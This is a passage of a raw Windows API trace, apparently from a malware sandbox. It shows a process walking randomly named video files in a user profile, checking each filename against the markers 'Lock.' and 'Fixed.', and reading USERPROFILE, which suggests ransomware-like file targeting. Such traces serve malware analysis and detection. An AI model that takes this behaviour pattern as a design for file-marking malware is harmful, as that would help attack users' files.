hHeap=0x2af0000) returned 1 [0213.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0213.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0213.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5a) returned 0x2a74df8 [0213.742] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/qt2pH0rRBDAlo9_9_.avi", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\qt2pH0rRBDAlo9_9_.avi", lpFilePart=0x8cf650*="qt2pH0rRBDAlo9_9_.avi") returned 0x2c [0213.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74df8 | out: hHeap=0x2af0000) returned 1 [0213.742] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\qt2pH0rRBDAlo9_9_.avi" (normalized: "c:\\users\\fd1hvy\\videos\\qt2ph0rrbdalo9_9_.avi")) returned 0xffffffff [0213.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74d28 | out: hHeap=0x2af0000) returned 1 [0213.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0213.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0213.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0213.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0213.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0213.742] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0213.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0213.742] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0213.742] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0213.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0213.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0213.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0213.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0213.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0213.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0213.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0213.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0213.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0213.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0213.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0213.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0213.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0213.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RV_dV0DIDgvgK.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0213.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V_dV0DIDgvgK.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0213.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_dV0DIDgvgK.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0213.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dV0DIDgvgK.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0213.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V0DIDgvgK.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0213.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0DIDgvgK.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0213.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DIDgvgK.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0213.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IDgvgK.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0213.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DgvgK.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0213.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gvgK.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0213.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vgK.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0213.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gK.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0213.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0213.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0213.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0213.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0213.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0213.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0213.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0213.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0213.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0213.743] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0213.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0213.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0213.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0213.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0213.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0213.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0213.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0213.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0213.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0213.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0213.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0213.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0213.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0213.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0213.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0213.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0213.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0213.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0213.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69670 [0213.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0213.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RV_dV0DIDgvgK.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0213.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V_dV0DIDgvgK.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0213.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_dV0DIDgvgK.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0213.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dV0DIDgvgK.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0213.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V0DIDgvgK.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0213.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0DIDgvgK.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0213.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DIDgvgK.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0213.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IDgvgK.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0213.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DgvgK.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0213.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gvgK.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0213.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vgK.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0213.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gK.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0213.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0213.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa66b8 [0213.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0213.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa66b8 | out: hHeap=0x2af0000) returned 1 [0213.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0213.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0213.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0213.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0213.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0213.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0213.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0213.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0213.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0213.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa64c0 | out: hHeap=0x2af0000) returned 1 [0213.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0213.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0213.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0213.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0213.746] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0213.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0213.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0213.746] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0213.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0213.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0213.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0213.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721e8 [0213.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0213.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0213.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0213.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0213.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0213.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0213.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0213.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0213.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0213.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0213.747] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0213.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0213.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0213.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaafc0 [0213.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0213.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0213.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab110 [0213.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0213.747] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0213.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0213.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0213.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0213.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0213.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0213.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0213.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0213.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0213.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0213.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0213.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0213.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0213.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0213.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0213.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0213.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0213.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a749e8 [0213.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0213.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0213.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0213.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0213.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0213.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0213.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0213.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0213.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0213.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0213.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0213.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72318 [0213.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0213.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0213.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0213.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0213.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0213.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0213.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0213.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0213.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0213.748] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0213.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0213.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0213.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf30 [0213.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0213.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0213.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf60 [0213.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0213.749] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0213.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0213.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0213.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0213.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0213.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0213.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0213.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0213.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0213.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0213.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0213.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0213.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0213.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0213.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0213.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0213.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0213.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a750d0 [0213.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0213.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0213.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0213.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0213.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0213.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0213.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0213.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0213.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0213.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722d8 [0213.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0213.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0213.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0213.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0213.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721a8 [0213.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0213.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0213.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0213.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab068 [0213.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0213.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0213.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0213.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0213.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0213.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0213.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0213.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0213.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0213.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0213.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0213.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0213.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0213.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0213.751] RtlAllocateHeap 